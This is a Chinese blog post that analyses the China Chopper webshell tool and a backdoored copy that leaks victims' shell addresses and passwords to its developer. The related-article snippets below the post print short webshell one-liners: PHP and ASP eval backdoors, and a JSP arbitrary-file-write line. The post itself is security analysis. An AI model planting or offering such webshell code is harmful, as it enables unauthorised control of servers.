全面分析中国菜刀及隐藏后门

最新推荐文章于 2022-08-03 09:17:29 发布
最新推荐文章于 2022-08-03 09:17:29 发布
阅读量1k 收藏
点赞数 1
分类专栏: 信息安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29566629/article/details/123147373
版权
  1. 使用PEiD查看菜刀工具有无加壳:在这里插入图片描述
  2. winhex 显示的ASCII码转化成的字符串和linux下strings命令查看出来的一样:在这里插入图片描述
    在这里插入图片描述
  3. 菜刀的流量都是明文传输的
  4. 存在待后门的菜刀:在这里插入图片描述
    比如这个菜刀的流量,经过URL解码和base64解码以后,还有一串base64加密的流量,解密以后如图:在这里插入图片描述
    很明显在攻击的时候,把靶机的地址、请求URL、口令都发送给了划线的地址,这就是这个菜刀工具开发者留的后门,可以轻松的收集到使用这个工具的人找到的shell。
qq_29566629
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用php实现批量查询清除一句话后门的代码
10-30
一句话后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句话后门的代码,大家可以省去不少麻烦了
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
最新发布
qq_53058639的博客
03-16 1082
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
分析中国菜刀隐藏后门
Yale的博客
01-17 681
作为一款黑客神器,怎么可能裸奔呢? 我们通过peid等工具可以看出来加壳了 通过winehx,也可以看到菜刀经过upx加壳处理
利用Fiddler2和Proxifier分析你用的中国菜刀是否带有后门
weixin_30273501的博客
01-23 189
为了避免自己辛辛苦苦拿下的站点被一些拿来主义者不费吹灰之力就据为己有,下面来教大家如何检测菜刀有没有留后门。 对于有没有后门这个问题,大牛们会说抓包看一下就行了,那如何抓包呢?有很多软件可以,这里使用的是Fiddler2(免费,E文,下载地址请问谷歌)。另外由于菜刀本身不支持代理,所以我们需要一款软件中转一下,这里用的是Proxifier。 以上两款软件的下载、安装、配置过程略。 首先,设置P...
如何给中国菜刀添加隐蔽后门
weixin_34413065的博客
08-20 554
文中提及的部分技术可能带有一定***性,仅供安全学习和教学用途,禁止非法使用。中国菜刀,不用多说,是大多黑阔经常使用的工具,具体使用方法,网上有很多教程,这里我讲下如何给菜刀添加隐蔽后门。1、后门如何触发这里要先讲下菜刀后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图当我们执行右键-编辑文...
菜刀php后门,关于菜刀后门排查
weixin_33216057的博客
03-18 196
关于菜刀后门排查小杰哥 (能学则学,技多不压身。) | 2016-03-08 14:56最近菜刀后门被爆出来后大家都在寻找没有后门菜刀可是…人家说没后门你却不知道是否真的没有后门(除非自己抓下包或者反编译看看)去年的时候菜刀后门事件被爆 可没有现在那么火热我也在挺早的时间查了一下自己的菜刀确实有发现请求,不过现在去掉了可是…记得前段时间看到一篇文章 连上菜刀不发包但是你做操...
webshell菜刀后门分析
weixin_41489908的博客
03-13 629
大部分男人收到的第一束花,都是在自己的墓碑前。。。 ​---- 网易云热评 一、WSockExpert,一款对进程抓包的软件 关注视频号:之乎者也吧,私信获取下载地址 二、打开菜刀,并在WSExplore中找到菜刀进程,右击,打开进程 三、在菜刀中添加一句话木马地址及密码,并连接 四、查看WSExplore,会发现两条可疑的数据包,地址和其他的不一样,提交信息中也有一句话木马地址和密码 禁止非法,后果自负 欢迎关注公众号:web安全工具...
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
xise菜刀后门,支持任意方式链接
04-22
xise修改版,支持任意一句话链接,目录查看等,jspx也可以查看
JSP一句话后门
01-08
<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());...
Xise19.9无视世界WAF.zip_菜刀
09-15
更新日志  生成内页修复生成内页内核,加速生成效率。  生成内页支持新闻采集模式,可选本地新闻或远程新闻。  生成内页支持防删功能。  生成内页支持批量操作,可数千shell不间断生成。...
菜刀php后门,如何防止中国菜刀后门泄露webshell地址
weixin_39534208的博客
03-18 139
通过本地中转可以很好地防止带后门菜刀窃取webshell。PHP代码如下所示,原理自行思考,不懂的请留言$webshell="http://www.victim.com/webshell.php";//把这里改成你的shell地址$temp=$_POST;$data = $temp;$data = http_build_query($data);$opts = array ('http' =&g...
中国菜刀
weixin_30298497的博客
06-30 123
看见名字还是很惊讶的 中国菜刀。。结果 打开文件看见一个后缀问 cnmp.. 文件,第一次尝试着先改成RAR 文件打开 发现里面有一个无后缀的文件 延续着上一题的检验先改成ZIP格式 打开发现里面有个 flag.txt 打开就有FLAG 肯定还有其他解法 http://ctf.bugku.com/challenges 转载于:https://www.cnblogs.com/lvs...
分析_中国菜刀
weixin_30548917的博客
02-13 192
题目链接:https://ctf.bugku.com/challenges 题解: 下载.zip文件 解压得到.pcapng文件,用wireshark打开 跟踪tcp流,发现一个flag.tar.gz的压缩文件,也许在此压缩包中能找到flag 既然是一个文件中包含另一个文件,那就试一试binwalk,于是用kili得到其压缩文件(binwalk命令) 命令:binw...
中国菜刀原理
weixin_34409822的博客
05-25 604
用了菜刀用了也有一段时间了,感觉挺神奇了,这里做一个小小的探究吧,起始也就是用鲨鱼抓包看看软件是怎么通信实现的,不敢卖弄知识,权当学习笔记了,大神路过呵呵这货就是主界面,环境啥的就随意了,IIS,阿帕奇,阿金科斯都可以,我这里用apache,因为之前搞的是PHP开发,对PHP相对比较熟悉,随机就用PHP的一句话来做实验了,Asp和jsp的原理应该都差不多。服务端的.php是这...
中国菜刀使用介绍
m0_37786014的博客
12-04 1694
一、简介 服务器只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。 目前支持的服务端脚本:PHP、ASP、.NET,并且支持、https安全连接的网站 在服务器端运行的代码如下: PHP:<?php @eval($_POST['pass'];?)> ASP:<%eval request("pass")%> ASP.NET:...
【webshell管理工具之一】中国菜刀
redwand的博客
05-08 5504
写一个webshell的管理工具使用系列,以便于更好的理解和实战运用,先从大名鼎鼎的中国菜刀开始吧。
中国菜刀原理与实践
悦分享
08-03 1596
中国菜刀(Chopper)是一款经典的网站管理工具,具有文件管理、数据库管理、虚拟终端等功能。服务端其中‍Sp4ar是连接密码,可以随意更改。也可对服务端做一些混淆操作。配置类型 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种主机地址 主机地址可为机器名或IP地址,如localhost数据库用户 连接数据库的用户名,如root数据库密码 连接数据库的密码,如123456。...
buuctf菜刀666
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要找到解压密码,可以在数据流中寻找或者进行爆破。请注意,解压密码可能以password的方式出现在数据流中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值